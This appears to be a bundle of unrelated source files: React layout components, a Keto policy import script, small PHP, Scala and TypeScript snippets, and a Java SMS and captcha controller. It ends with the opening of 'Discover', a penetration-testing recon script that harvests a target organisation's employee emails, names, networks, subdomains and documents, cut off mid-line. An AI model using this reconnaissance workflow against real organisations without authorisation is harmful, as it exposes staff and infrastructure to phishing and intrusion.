import Divider from '@material-ui/core/Divider';
import IconButton from '@material-ui/core/IconButton';
import Badge from '@material-ui/core/Badge';
import Container from '@material-ui/core/Container';
import Grid from '@material-ui/core/Grid';
import Paper from '@material-ui/core/Paper';
import Link from '@material-ui/core/Link';
import MenuIcon from '@material-ui/icons/Menu';
import ChevronLeftIcon from '@material-ui/icons/ChevronLeft';
import NotificationsIcon from '@material-ui/icons/Notifications';
import Avatar from '@material-ui/icons/Notifications';
import { IconBell, IconChevronUp, IconSearch } from '@tabler/icons';
import seelogo from '../../assets/images/seelogo.png';
// import Chart from './Chart';
// import Deposits from './Deposits';
// import Orders from './Orders';
import Header from '../../components/Header';
import Sidebar from '../../components/Sidebar';
import Home from '../Home';
import { Outlet } from 'react-router-dom';
import { styled } from '@material-ui/core/styles';
function Copyright() {
return (
<Typography variant="body2" color="textSecondary" align="center">
{'Copyright © '}
<Link color="inherit" href="https://material-ui.com/">
Your Website
</Link>
{' '}
{new Date().getFullYear()}
.
</Typography>
);
}
// Width (px) of the navigation drawer when open.
const drawerWidth = 240;

// JSS style rules for the dashboard layout (MUI v4 makeStyles API).
const useStyles = makeStyles((theme) => ({
    root: {
        display: 'flex',
    },
    toolbar: {
        paddingRight: 24, // keep right padding when drawer closed
    },
    toolbarIcon: {
        display: 'flex',
        alignItems: 'center',
        justifyContent: 'center',
        border: 'none',
        padding: '0 8px',
        ...theme.mixins.toolbar,
    },
    appBar: {
        // Keep the app bar above the drawer.
        zIndex: theme.zIndex.drawer + 1,
        transition: theme.transitions.create(['width', 'margin'], {
            easing: theme.transitions.easing.sharp,
            duration: theme.transitions.duration.leavingScreen,
        }),
    },
    // Applied while the drawer is open: shift and shrink the app bar.
    appBarShift: {
        marginLeft: drawerWidth,
        width: `calc(100% - ${drawerWidth}px)`,
        transition: theme.transitions.create(['width', 'margin'], {
            easing: theme.transitions.easing.sharp,
            duration: theme.transitions.duration.enteringScreen,
        }),
    },
    menuButton: {
        marginRight: 36,
    },
    menuButtonHidden: {
        display: 'none',
    },
    title: {
        flexGrow: 1,
    },
    drawerPaper: {
        position: 'relative',
        whiteSpace: 'nowrap',
        width: drawerWidth,
        transition: theme.transitions.create('width', {
            easing: theme.transitions.easing.sharp,
            duration: theme.transitions.duration.enteringScreen,
        }),
    },
    // Collapsed drawer: narrow rail sized by theme spacing.
    drawerPaperClose: {
        overflowX: 'hidden',
        transition: theme.transitions.create('width', {
            easing: theme.transitions.easing.sharp,
            duration: theme.transitions.duration.leavingScreen,
        }),
        width: theme.spacing(7),
        [theme.breakpoints.up('sm')]: {
            width: theme.spacing(9),
        },
    },
    // Spacer matching the app bar height so content starts below it.
    appBarSpacer: theme.mixins.toolbar,
    content: {
        flexGrow: 1,
        height: '100vh',
        overflow: 'auto',
        backgroundColor: '#EFF1F5',
        paddingTop:"15px"
    },
    container: {
        paddingTop: theme.spacing(4),
        paddingBottom: theme.spacing(4),
    },
    paper: {
        padding: theme.spacing(2),
        display: 'flex',
        overflow: 'auto',
        flexDirection: 'column',
    },
    fixedHeight: {
        height: 240,
    },
    headerAvatar: {
        height: '10vh'
    },
}));
// Full-viewport flex root for the dashboard layout.
const DashboardLayoutRoot = styled('div')(
    ({ theme }) => ({
        backgroundColor: theme.palette.background.default,
        display: 'flex',
        height: '100%',
        overflow: 'hidden',
        width: '100%'
    })
);

// Offsets content below the 64px app bar and, on large screens, to the
// right of the 256px sidebar.
const DashboardLayoutWrapper = styled('div')(
    ({ theme }) => ({
        display: 'flex',
        flex: '1 1 auto',
        overflow: 'hidden',
        paddingTop: 64,
        [theme.breakpoints.up('lg')]: {
            paddingLeft: 256
        }
    })
);

// NOTE(review): the two containers below are only referenced from
// commented-out JSX in Dashboard — confirm before removing.
const DashboardLayoutContainer = styled('div')({
    display: 'flex',
    width:"100%",
    flex: '1 1 auto',
    overflow: 'hidden'
});

const DashboardLayoutContent = styled('div')({
    flex: '1 1 auto',
    height: '100%',
    overflow: 'auto'
});
export default function Dashboard(props) {
const classes = useStyles();
const [open, setOpen] = React.useState(false);
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () => {
//console.log('hyy');
setOpen(false);
};
const handleToggleDrawer = () => {
setOpen(open?false:true);
};
const fixedHeightPaper = clsx(classes.paper, classes.fixedHeight);
return (
// <div className={classes.root}>
// <Header
// handleToggleDrawer={handleToggleDrawer}
// open={open}
// />
// <Sidebar open={open} drawerWidth={drawerWidth} />
// <main className={classes.content}>
// <div className={classes.appBarSpacer} />
// {/* {props.children} */}
// <Outlet />
// </main>
// {/* <DashboardLayoutContainer>
// <DashboardLayoutContent>
// <Outlet />
// </DashboardLayoutContent>
// </DashboardLayoutContainer> */}
// </div>
<div className={classes.root}>
<Header
handleToggleDrawer={handleToggleDrawer}
open={open}
/>
{/* <Sidebar open={open} drawerWidth={drawerWidth} handleToggleDrawer={handleToggleDrawer} /> */}
<main className={classes.content}>
<div className={classes.appBarSpacer} />
<Outlet />
</main>
</div>
);
}
|
#!/bin/bash
set -euo pipefail
source "$( dirname "${BASH_SOURCE[0]}" )/../helper/getid.sh"

url=$1
path=$2
# NOTE: the glob below is expanded where $policy_path is used unquoted in
# the for-loops; do not quote it there.
policy_path="$path/policies/*.json"

echo "Deleting policies in $policy_path..."
for filename in $policy_path; do
    # Quote expansions so paths/ids containing spaces survive word splitting.
    id=$(getid "$filename")
    (set -x; keto policies --endpoint "$url" delete "$id" || true)
done
echo "Deleted all policies in $policy_path!"

echo "Importing policies in $policy_path..."
for filename in $policy_path; do
    (set -x; keto policies --endpoint "$url" import "$filename")
done
echo "Imported all policies in $policy_path!"
|
/**
 * Swaps the values of two variables in place.
 *
 * Uses a temporary variable instead of the previous add/subtract trick,
 * which only worked for numeric values (and could lose precision with
 * floats); this version swaps values of any type exactly.
 */
function swap(&$a, &$b){
    $tmp = $a;
    $a = $b;
    $b = $tmp;
}
|
// Loads the print-related helper scripts synchronously and in order.
// NOTE(review): document.write blocks parsing and is discouraged on the
// modern web — consider static <script> tags or createElement injection;
// left as-is because later scripts may depend on this exact load order.
document.write("<script type='text/javascript' src='print.js'></script>");
document.write("<script type='text/javascript' src='print1.js'></script>");
document.write("<script type='text/javascript' src='print2.js'></script>");
document.write("<script type='text/javascript' src='printall.js'></script>");
document.write("<script type='text/javascript' src='printhtml.js'></script>");
document.write("<script type='text/javascript' src='addpagecomment.js'></script>");
document.write("<script type='text/javascript' src='batchprintdialog.js'></script>");
|
<reponame>nitinchauhan1986/AsianetRepo<filename>src/components/desktop/Header/Socials/WithSocials.js
import React from 'react';
import Loadable from 'react-loadable';
// Lazily-loaded Socials component; webpack splits it into its own chunk
// and nothing is rendered while the chunk is downloading.
const LoadableComponent = Loadable({
    loader: () => import(/* webpackChunkName: 'Socials' */ './Socials'),
    loading: () => null,
});
export default class WithSocials extends React.Component {
constructor() {
super();
this.state = {};
}
componentDidMount() {
setTimeout(() => {
this.setState({ load: true });
}, 1000);
}
render() {
if (!this.state.load) {
return null;
}
return <LoadableComponent {...this.props} />;
}
}
|
<reponame>johannespfann/deepspace
package de.pfann.deepspace.fightsystem.chain
import de.pfann.deepspace.api.{AttackAction, Fightable}
// Terminal state of the attacker's fight chain: the fight is over, so this
// state exposes no fleets, ignores attacks and reports the attacker dead.
class AttackerEndState extends AttackerState{
  // Starting a fight from the end state is a programming error.
  override def startFight(): Unit = {
    throw new NotImplementedError()
  }

  // No fleets remain once the end state is reached.
  override def getFleets(): List[Fightable] = {
    List[Fightable]()
  }

  // Attacks are ignored; the log line flags the unexpected call.
  override def attack(attackAction: AttackAction): Unit = {
    println(this.getClass.getSimpleName + " attack - 0 -> should not happen")
    // do nothing
  }

  // The attacker is always considered dead in the end state.
  override def isAlive(): Boolean = {
    println(this.getClass.getSimpleName + " isAlive - false")
    false
  }
}
|
<filename>src/interfaces/validation/ivalidator.ts
/**
 * Synchronous validator contract for values of type T.
 * NOTE(review): validateSync returns void, so implementations presumably
 * signal invalid input by throwing — confirm against implementations.
 */
export interface IValidator<T> {
    /** Validates `data` synchronously; no return value on success. */
    readonly validateSync: (data: T) => void;
}
|
package cn.dmdream.cas.controller;
import cn.dmdream.cas.utils.CapchaUtil;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jms.core.JmsTemplate;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.imageio.ImageIO;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.awt.image.BufferedImage;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
/**
 * Endpoints supporting SMS login: queues verification-code messages for the
 * SMS gateway and serves captcha images for the login form.
 */
@RestController
public class SmsController {

    // JMS template used to hand messages to the message-queue server.
    @Autowired
    private JmsTemplate jmsTemplate;

    /**
     * Validates the phone number and queues a random 6-digit verification
     * code for delivery by the SMS gateway service.
     *
     * @param phone recipient mobile number (mainland-China format)
     * @return "success" when queued, otherwise a user-facing error message
     */
    @RequestMapping("sendSms/{phone}")
    public String sendSms(@PathVariable("phone") String phone) {
        if (phone == null || "".equals(phone)) {
            return "请输入正确的手机号!";
        }
        // Mainland-China mobile number pattern.
        String phoneReg = "^((13[0-9])|(14[5,7,9])|(15([0-3]|[5-9]))|(166)|(17[0,1,3,5,6,7,8])|(18[0-9])|(19[8|9]))\\d{8}$";
        if (!phone.matches(phoneReg)) {
            return "请输入正确的手机号!";
        }
        // Build the message payload: recipient number plus a random code.
        Map<String, String> mapMessage = new HashMap<String, String>();
        mapMessage.put("mobile", phone);
        // Random 6-digit code in [100000, 999999].
        int code = (int)((Math.random()*9+1)*100000);
        mapMessage.put("code", code+"");
        String jsonMap = null;
        try {
            jsonMap = new ObjectMapper().writeValueAsString(mapMessage);
        } catch (JsonProcessingException e) {
            e.printStackTrace();
            return "消息处理异常";
        }
        // Send the message to the SMS gateway service's login queue.
        jmsTemplate.convertAndSend("fg-sms-login-Queue",jsonMap);
        return "success";
    }

    /** Session attribute under which the captcha answer is stored. */
    public static final String KEY_CAPTCHA = "capcha";

    /**
     * Renders a captcha image and stores its text in the session under
     * {@link #KEY_CAPTCHA} for later verification.
     */
    @RequestMapping("/capcha.jpg")
    public void getCaptcha(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {
        // Tell the browser the response body is an image.
        response.setContentType("image/jpeg");
        // Disable caching so every request produces a fresh captcha.
        response.setHeader("Pragma", "No-cache");
        response.setHeader("Cache-Control", "no-cache");
        // Fixed: the standard HTTP header is "Expires", not "Expire".
        response.setDateHeader("Expires", 0);
        try {
            HttpSession session = request.getSession();
            CapchaUtil tool = new CapchaUtil();
            StringBuffer code = new StringBuffer();
            BufferedImage image = tool.genRandomCodeImage(code);
            session.removeAttribute(KEY_CAPTCHA);
            session.setAttribute(KEY_CAPTCHA, code.toString());
            // Stream the in-memory image to the client.
            ImageIO.write(image, "JPEG", response.getOutputStream());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
|
#!/bin/bash
#
# by Lee Baird
# Contact me via chat or email with any feedback or suggestions that you may have:
# leebaird@gmail.com
#
# Special thanks to the following people:
#
# Jay Townsend - conversion from Backtrack to Kali, manages pull requests & issues
# Jason Ashton (@ninewires) - Penetration Testers Framework (PTF) compatibility, Registered Domains, bug crusher, and bash ninja
#
# Ben Wood (@DilithiumCore) - regex master
# Dave Klug - planning, testing and bug reports
# Jason Arnold (@jasonarnold) - planning original concept, author of ssl-check and co-author of crack-wifi
# John Kim - python guru, bug smasher, and parsers
# Eric Milam (@Brav0Hax) - total re-write using functions
# Hector Portillo - report framework v3
# Ian Norden (@iancnorden) - report framework v2
# Martin Bos (@cantcomputer) - IDS evasion techniques
# Matt Banick - original development
# Numerous people on freenode IRC - #bash and #sed (e36freak)
# Rob Dixon (@304geek) - report framework concept
# Robert Clowser (@dyslexicjedi) - all things
# Saviour Emmanuel - Nmap parser
# Securicon, LLC. - for sponsoring development of parsers
# Steve Copland - report framework v1
# Arthur Kay (@arthurakay) - python scripts
##############################################################################################################
# Catch process termination and salvage partial results (see f_terminate).
trap f_terminate SIGHUP SIGINT SIGTERM

# Global variables
home=$HOME
long='==============================================================================================================================='
medium='=================================================================='
short='========================================'
# Numeric, unique sort for dotted-quad IPv4 addresses.
sip='sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4'
BLUE='\033[1;34m'
RED='\033[1;31m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Check for instances of Discover >1
updatedb
locate discover.sh > tmpinstance
# Feed the file on stdin so wc prints only the count — no trailing file
# name to strip, and no dependence on wc's column padding.
instqty=$(wc -l < tmpinstance)
if [ "$instqty" -gt 1 ]; then
     echo
     echo -e "${YELLOW}$medium ${NC}"
     echo
     echo -e "Found ${YELLOW}$instqty${NC} instances of Discover on your system."
     echo 'Refer to the following paths:'
     sed 's/^/\t/' tmpinstance
     echo
     echo 'Remove or rename all but the install path and try again.'
     echo -e "If renaming, ${YELLOW}'discover.sh'${NC} can't be in name. Try ${YELLOW}'discover.bu'${NC} etc."
     echo
     echo -e "${YELLOW}$medium ${NC}"
     echo
     rm tmpinstance
     exit
else
     rm tmpinstance
fi
# Platform detection: choose the browser, network interface, local IP, and
# Metasploit paths appropriate for OS X (Darwin) versus Linux.
case $(uname) in
     Darwin)
          browser=Safari
          discover=$(locate discover.sh | sed 's:/[^/]*$::')
          interface=en0
          ip=$(ifconfig | grep 'en0' -A2 | grep 'inet' | cut -d ' ' -f2)
          msf=/opt/metasploit-framework/bin/msfconsole
          msfv=/opt/metasploit-framework/bin/msfvenom
          port=4444
          web="open -a Safari"
          ;;
     *)
          browser=Firefox
          discover=$(updatedb; locate discover.sh | sed 's:/[^/]*$::')
          interface=$(ip addr | grep 'global' | awk '{print $8}')
          ip=$(ip addr | grep 'global' | cut -d '/' -f1 | awk '{print $2}')
          msf=msfconsole
          msfv=msfvenom
          port=443
          web="firefox -new-tab"
          ;;
esac
##############################################################################################################
# Print the Discover ASCII-art banner in yellow, framed by blank lines.
# The banner is a single multi-line string so the art's spacing survives
# exactly as written; ${YELLOW}/${NC} open and close the color.
f_banner(){
echo
echo -e "${YELLOW}
 _____ ___ _____ _____ _____ _ _ _____ _____
| \ | |____ | | | \ / |____ |____/
|_____/ _|_ _____| |_____ |_____| \/ |_____ | \_
By Lee Baird${NC}"
echo
echo
}
##############################################################################################################
# Show a red "invalid entry" notice framed by rule lines, pause so the
# user can read it, then drop back to the main menu.
f_error(){
printf '\n%b\n\n%b\n\n%b\n' \
    "${RED}$medium${NC}" \
    "${RED} *** Invalid choice or entry. ***${NC}" \
    "${RED}$medium${NC}"
sleep 2
f_main
}
# When running on OS X (Darwin), warn that the selected option is not
# supported there and return to the main menu; a no-op on other platforms.
f_errorOSX(){
if [[ $(uname) == 'Darwin' ]]; then
     printf '\n%b\n\n%b\n\n%b\n' \
         "${RED}$medium${NC}" \
         "${RED} *** Not OS X compatible. ***${NC}" \
         "${RED}$medium${NC}"
     sleep 2
     f_main
fi
}
##############################################################################################################
# Prompt for a file path (readline-enabled so tab completion works) and
# validate it, bailing out via f_error on empty input or a path that is
# not a regular file. Sets the global $location for the caller.
f_location(){
     echo
     echo -n "Enter the location of your file: "
     read -e location

     # Quote the path so file names containing spaces or glob characters
     # do not word-split inside the test; reject empty input and
     # non-existent files in one check.
     if [[ -z "$location" || ! -f "$location" ]]; then
          f_error
     fi
}
##############################################################################################################
# Abort with a red notice when no X display is available — the selected
# option needs a local graphical session (e.g. to open a browser).
f_runlocally(){
if [[ -z $DISPLAY ]]; then
     printf '\n%b\n\n%b\n\n%b\n\n\n' \
         "${RED}$medium${NC}" \
         "${RED} *** This option must be ran locally. ***${NC}" \
         "${RED}$medium${NC}"
     exit
fi
}
##############################################################################################################
# Signal handler (SIGHUP/SIGINT/SIGTERM): salvage any partial scan output
# into a timestamped directory under $home/data, then exit.
f_terminate(){
save_dir=$home/data/cancelled-$(date +%H:%M:%S)
echo
echo "Terminating..."
echo
echo -e "\e[1;33mAll data will be saved in $save_dir.\e[0m"
# Create the full destination tree up front. The moves below target
# $save_dir/passive(/recon-ng) and $save_dir/active(/recon-ng); without
# mkdir -p those mv commands fail silently (errors are discarded) and
# the in-progress data is lost.
mkdir -p $save_dir/passive/recon-ng $save_dir/active/recon-ng
# Nmap and Metasploit scans
mv $name/ $save_dir 2>/dev/null
# Passive files
mv curl debug* email* hosts name* network* records registered* squatting sub* usernames-recon whois* z* doc pdf ppt txt xls $save_dir/passive/ 2>/dev/null
cd /tmp/; mv emails names* networks subdomains usernames $save_dir/passive/recon-ng/ 2>/dev/null
# Active files
mv active.rc emails hosts record* sub* waf whatweb z* $save_dir/active/ 2>/dev/null
cd /tmp/; mv subdomains $save_dir/active/recon-ng/ 2>/dev/null
echo
echo "Saving complete."
echo
echo
exit
}
##############################################################################################################
f_domain(){
clear
f_banner
echo -e "${BLUE}RECON${NC}"
echo
echo "1. Passive"
echo "2. Active"
echo "3. Import names into an existing recon-ng workspace"
echo "4. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1)
clear
f_banner
echo -e "${BLUE}Uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester,${NC}"
echo -e "${BLUE} Metasploit, URLCrazy, Whois, multiple websites, and recon-ng.${NC}"
echo
echo -e "${BLUE}[*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub,${NC}"
echo -e "${BLUE} Google, Hashes, Hunter, SecurityTrails, and Shodan for${NC}"
echo -e "${BLUE} maximum results with recon-ng and theHarvester.${NC}"
echo
echo $medium
echo
echo "Usage"
echo
echo "Company: Target"
echo "Domain: target.com"
echo
echo $medium
echo
echo -n "Company: "
read company
# Check for no answer
if [[ -z $company ]]; then
f_error
fi
echo -n "Domain: "
read domain
# Check for no answer
if [[ -z $domain ]]; then
f_error
fi
companyurl=$( printf "%s\n" "$company" | sed 's/ /%20/g; s/\&/%26/g; s/\,/%2C/g' )
rundate=`date +%B' '%d,' '%Y`
total=37
# If folder doesn't exist, create it
if [ ! -d $home/data/$domain ]; then
cp -R $discover/report/ $home/data/$domain
sed -i "s/#COMPANY#/$company/" $home/data/$domain/index.htm
sed -i "s/#DOMAIN#/$domain/" $home/data/$domain/index.htm
sed -i "s/#DATE#/$rundate/" $home/data/$domain/index.htm
fi
echo
echo $medium
echo
echo "ARIN"
echo " Email (1/$total)"
wget -q https://whois.arin.net/rest/pocs\;domain=$domain -O tmp.xml
if [ -s tmp.xml ]; then
xmllint --format tmp.xml | grep 'handle' | cut -d '>' -f2 | cut -d '<' -f1 | sort -u > zurls.txt
xmllint --format tmp.xml | grep 'handle' | cut -d '"' -f2 | sort -u > zhandles.txt
while read x; do
wget -q $x -O tmp2.xml
xml_grep 'email' tmp2.xml --text_only >> tmp
done < zurls.txt
cat tmp | tr '[A-Z]' '[a-z]' | sort -u > zarin-emails
fi
rm tmp* 2>/dev/null
echo " Names (2/$total)"
if [ -e zhandles.txt ]; then
while read y; do
curl -s https://whois.arin.net/rest/poc/$y.txt | grep 'Name' >> tmp
done < zhandles.txt
egrep -v '(@|Network|Telecom)' tmp | sed 's/Name: //g' | tr '[A-Z]' '[a-z]' | sed 's/\b\(.\)/\u\1/g' > tmp2
awk -F", " '{print $2,$1}' tmp2 | sed 's/ / /g' | grep -v 'Admin' | sort -u > zarin-names
fi
rm zurls.txt zhandles.txt 2>/dev/null
echo " Networks (3/$total)"
wget -q https://whois.arin.net/rest/orgs\;name=$companyurl -O tmp.xml
if [ -s tmp.xml ]; then
xmllint --format tmp.xml | grep 'handle' | cut -d '/' -f6 | cut -d '<' -f1 | sort -uV > tmp
while read handle; do
echo " " $handle
curl -s https://whois.arin.net/rest/org/$handle/nets.txt > tmp2
if ! head -1 tmp2 | grep 'DOCTYPE' > /dev/null; then
awk '{print $4 "-" $6}' tmp2 >> tmp3
fi
done < tmp
fi
$sip tmp3 > networks-tmp 2>/dev/null
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp* 2>/dev/null
echo
echo "dnsrecon (4/$total)"
dnsrecon -d $domain > tmp
grep '*' tmp | egrep -v '(Bind Version|Checking|configured|DNSSEC|Enumerating|No SRV Records|Performing|PRIVATEDNS|Removing|Resolving|Servers found|SKEYs|Trying)' | sed 's/\[\*\]//g; s/^[ \t]*//' | column -t | sort -k1 > records
cat records >> $home/data/$domain/data/records.htm
grep $domain tmp | awk '{print $3 " " $4}' | awk '$2 !~ /[a-z]/' | grep -v '=' | column -t > sub-dnsrecon
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp 2>/dev/null
echo
echo "goofile (5/$total)"
python $discover/mods/goofile.py $domain doc > doc
python $discover/mods/goofile.py $domain docx | sort -u >> doc
python $discover/mods/goofile.py $domain pdf | sort -u > pdf
python $discover/mods/goofile.py $domain ppt > ppt
python $discover/mods/goofile.py $domain pptx | sort -u >> ppt
python $discover/mods/goofile.py $domain txt | sort -u > txt
python $discover/mods/goofile.py $domain xls > xls
python $discover/mods/goofile.py $domain xlsx | sort -u >> xls
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp* 2>/dev/null
echo
echo "goog-mail (6/$total)"
$discover/mods/goog-mail.py $domain | grep -v 'cannot' | tr '[A-Z]' '[a-z]' > zgoog-mail
# Remove all empty files
find -type f -empty -exec rm {} +
echo
echo "goohost"
echo " IP (7/$total)"
$discover/mods/goohost.sh -t $domain -m ip >/dev/null
echo " Email (8/$total)"
$discover/mods/goohost.sh -t $domain -m mail >/dev/null
cat report-* | grep $domain | column -t > zgoohost
rm *-$domain.txt tmp* 2>/dev/null
echo
echo "theHarvester"
cd /opt/theHarvester/
echo " Baidu (9/$total)"
python3 theHarvester.py -d $domain -l 100 -b baidu | egrep -v '(!|\*|--|\[|Searching|Warning|www)' | sed '/^$/d' > zbaidu
echo " Bing (10/$total)"
python3 theHarvester.py -d $domain -l 200 -b bing | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zbing
echo " Bing API (11/$total)"
python3 theHarvester.py -d $domain -l 200 -b bingapi | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zbingapi
echo " Censys (12/$total)"
python3 theHarvester.py -d $domain -l 100 -b censys | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zcensys
echo " crtsh (13/$total)"
python3 theHarvester.py -d $domain -l 100 -b crtsh | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zcrtsh
echo " Cymon (14/$total)"
python3 theHarvester.py -d $domain -l 100 -b cymon | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zcymon
echo " Dogpile (15/$total)"
python3 theHarvester.py -d $domain -l 100 -b dogpile | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zdogpile
echo " DuckDuckGo (16/$total)"
python3 theHarvester.py -d $domain -l 100 -b duckduckgo | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zduckduckgo
echo " Google (17/$total)"
python3 theHarvester.py -d $domain -l 100 -b google | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zgoogle
echo " Google-certificates (18/$total)"
python3 theHarvester.py -d $domain -l 100 -b google-certificates | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zgoogle-certificates
echo " Hunter (19/$total)"
python3 theHarvester.py -d $domain -l 100 -b hunter | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zhunter
echo " Intelx (20/$total)"
python3 theHarvester.py -d $domain -l 100 -b intelx | egrep -v '(!|\*|--|\[|Searching|Warning|/)' | sed '/^$/d' > zintelx
echo " Linkedin (21/$total)"
python3 theHarvester.py -d "$company" -l 100 -b linkedin | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > tmp
python3 theHarvester.py -d $domain -l 100 -b linkedin | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > tmp2
# Make first 2 columns title case.
cat tmp tmp2 | sed 's/\( *\)\([^ ]*\)\( *\)\([^ ]*\)/\1\L\u\2\3\L\u\4/' | sort -u > zlinkedin
echo " Netcraft (22/$total)"
python3 theHarvester.py -d $domain -l 100 -b netcraft | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > znetcraft
echo " SecurityTrails (23/$total)"
python3 theHarvester.py -d $domain -l 100 -b securityTrails | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zsecuritytrails
echo " ThreatCrowd (24/$total)"
python3 theHarvester.py -d $domain -l 100 -b threatcrowd | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zthreatcrowd
echo " VirusTotal (25/$total)"
python3 theHarvester.py -d $domain -l 100 -b virustotal | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zvirustotal
echo " Yahoo (26/$total)"
python3 theHarvester.py -d $domain -l 100 -b yahoo | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zyahoo
mv z* $discover
rm debug_results.txt stash.sqlite tmp* 2>/dev/null
# Remove all empty files
cd $discover/
find -type f -empty -exec rm {} +
echo
echo "Metasploit (27/$total)"
msfconsole -x "use auxiliary/gather/search_email_collector; set DOMAIN $domain; run; exit y" > tmp 2>/dev/null
grep @$domain tmp | awk '{print $2}' | grep -v '%' | grep -Fv '...@' > zmsf
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp 2>/dev/null
echo
echo "URLCrazy (28/$total)"
urlcrazy $domain > tmp
sed -n '/Character/,$p' tmp | sed 's/AUSTRALIA/Australia/g; s/AUSTRIA/Austria/g; s/BAHAMAS/Bahamas/g; s/BANGLADESH/Bangladesh/g;
s/BELGIUM/Belgium/g; s/BULGARIA/Bulgaria/g; s/CANADA/Canada/g; s/CAYMAN ISLANDS/Cayman Islands/g; s/CHILE/Chile/g; s/CHINA/China/g;
s/COLOMBIA/Columbia/g; s/COSTA RICA/Costa Rica/g; s/CZECH REPUBLIC/Czech Republic/g; s/DENMARK/Denmark/g; s/DOMINICAN REPUBLIC/Dominican Republic/g;
s/EUROPEAN UNION/European Union/g; s/FINLAND/Finland/g; s/FRANCE/France/g; s/GERMANY/Germany/g; s/HONG KONG/Hong Kong/g; s/HUNGARY/Hungary/g;
s/INDIA/India/g; s/INDONESIA/Indonesia/g; s/IRELAND/Ireland/g; s/ISRAEL/Israel/g; s/ITALY/Italy/g; s/JAPAN/Japan/g;
s/KOREA REPUBLIC OF/Republic of Korea/g; s/localhost//g; s/LUXEMBOURG/Luxembourg/g; s/NETHERLANDS/Netherlands/g; s/NORWAY/Norway/g; s/POLAND/Poland/g;
s/PORTUGAL/Portugal/g; s/PUERTO RICO/Puerto Rico/g; s/REPUBLIC OF China (ROC)/Republic of China/g; s/RUSSIAN FEDERATION/Russia /g;
s/SAUDI ARABIA/Saudi Arabia/g; s/SINGAPORE/Singapore/g; s/SPAIN/Spain/g; s/SWEDEN/Sweden/g; s/SWITZERLAND/Switzerland/g; s/TAIWAN/Taiwan/g;
s/THAILAND/Thailand/g; s/TURKEY/Turkey/g; s/UKRAINE/Ukraine/g; s/UNITED KINGDOM/United Kingdom/g; s/UNITED STATES/United States/g;
s/VIRGIN ISLANDS (BRITISH)/Brittish Virgin Islands/g; s/ROMANIA/Romania/g; s/SLOVAKIA/Slovakia/g; s/?/ /g' > tmp2
# Remove the last column
cat tmp2 | rev | sed 's/^[ \t]*//' | cut -d ' ' -f2- | rev > tmp3
cat tmp3 | sed 's/AU,//g; s/CA,//g; s/CH,//g; s/CN,//g; s/DE,//g; s/DK,//g; s/EU,//g; s/FR,//g; s/GB,//g; s/JP,//g; s/KR,//g; s/KY,//g; s/IN,//g;
s/IT,//g; s/NL,//g; s/NO,//g; s/PL,//g; s/PT,//g; s/RO,//g; s/RU,//g; s/SE,//g; s/SG,//g; s/TW,//g; s/US,//g; s/VG,//g' > tmp4
# Find domains that contain an IP
grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" tmp4 > squatting
rm tmp* 2>/dev/null
echo
##############################################################
echo "Whois"
echo " Domain (29/$total)"
whois -H $domain > tmp 2>/dev/null
# Remove leading whitespace
sed 's/^[ \t]*//' tmp > tmp2
# Clean up
egrep -iv '(#|%|<a|=-=-=-=|;|access may|accuracy|additionally|afilias except|and dns hosting|and limitations|any use of|be sure|at the end|by submitting|by the terms|can easily|circumstances|clientdeleteprohibited|clienttransferprohibited|clientupdateprohibited|company may|compilation|complaint will|contact information|contact us|contacting|copy and paste|currently set|database|data contained|data presented|database|date of|details|dissemination|domaininfo ab|domain management|domain names in|domain status: ok|enable high|except as|existing|failure|facsimile|for commercial|for detailed|for information|for more|for the|get noticed|get a free|guarantee its|href|If you|in europe|in most|in obtaining|in the address|includes|including|information is|is not|is providing|its systems|learn|makes this|markmonitor|minimum|mining this|minute and|modify|must be sent|name cannot|namesbeyond|not to use|note:|notice|obtaining information about|of moniker|of this data|or hiding any|or otherwise support|other use of|please|policy|prior written|privacy is|problem reporting|professional and|prohibited without|promote your|protect the|public interest|queries or|receive|receiving|register your|registrars|registration record|relevant|repackaging|request|reserves the|responsible for|restrictions|see business|server at|solicitations|sponsorship|status|support questions|support the transmission|supporting|telephone, or facsimile|Temporary|that apply to|that you will|the right| The data is|The fact that|the transmission|this listing|this feature|this information|this service is|to collect or|to entities|to report any|to suppress|transmission of|trusted partner|united states|unlimited|unsolicited advertising|users may|version 6|via e-mail|visible|visit aboutus.org|visit|web-based|when you|while believed|will use 